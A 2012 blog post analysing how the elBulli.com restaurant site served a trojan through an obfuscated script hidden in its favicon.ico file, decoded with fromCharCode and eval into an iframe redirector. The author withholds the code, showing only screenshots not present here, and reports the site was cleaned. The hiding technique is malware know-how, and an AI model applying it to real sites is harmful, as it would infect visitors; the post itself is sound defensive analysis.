elBulli.com infected with a Trojan

Posted on Mon 30 January 2012 in reversing

The world's most famous restaurant, once run by the iconic chef Ferran AdriĆ  but now closed, elBulli.com, appears to have been infected by an unknown source. As of 22:50 (CET +1) on Jan 30th the site elBulli.com is welcoming its visitors with an unpleasant surprise.

The site drops a malicious trojan downloaded via a hidden script in the favicon.ico file. Follows an analyzing session dissecting what the script does and how.

UPDATE: At 8:40 CET+1 (Jan 31st) the malware was removed from the site and the source of the exploits was found and patched, as reported by the sys admins. It is once again safe to visit elBulli.com

I was first tipped off by @jamon_y_vino, entrepreneurial foodtivist who, while doing some research got a beautiful warning by Avast! antivirus. After the initial sadness in her face for not being able to visit the site and my incredible excitement for having the opportunity to analyze the virus first hand, I took a screenshot of the red warning thrown by Avast!

elbulli.com infection

Reported as a redirector type of javascript malware, it takes the visitor of the infected site to another site where arbitrary files are downloaded, such as the trojan itself or whatever the attacker has prepared.

Let's take a look at the problematic file.

After downloading www.elbulli.com/favicon.ico with cURL I fired Notepad++ and found an obfuscated <script>. That made me hungry and I put a pizza in the oven before commencing reverse engineering on the file.

I will not paste the code here but screen caps with sections of it. After the common sideways statements to disguise malicious code, the payload is decrypted with the usual fromCharCode()+ eval() javascript.

deobfuscating favicon.ico

The loop going from lines 27 to 35 decrypts the payload and the final eval() runs it. To see what this is hiding we'll just remove the eval() and replace it with some form of print out, to get this:

iframer code

And that's where we hit the target of the malware. It's getting to a very suspicious URL, in fact Google Safe Browsing diagnostic page is reporting the domain as suspicions, being known for hosting malware in the last 90 days. A whois of the domain itself shows some .RU domain servers handling the data, which doesn't make me feel very comfortable.

Further study of the results of visiting that stat.php page promise to be very interesting, but the priority here is to report the vulnerability and let the web admins deal with it.

The conclusions achieved by virustotal.com when submitting the infected favicon.ico are not surprising, giving a total of [15 out of 37 positives] https://www.virustotal.com/file/6b7cbf6153644e11ca1caaaf632f8a0850b378cefe1dbd99d18af0955ffef41a/analysis/1327957385/).

~~I will update this post with news about the threat.~~ See update on top.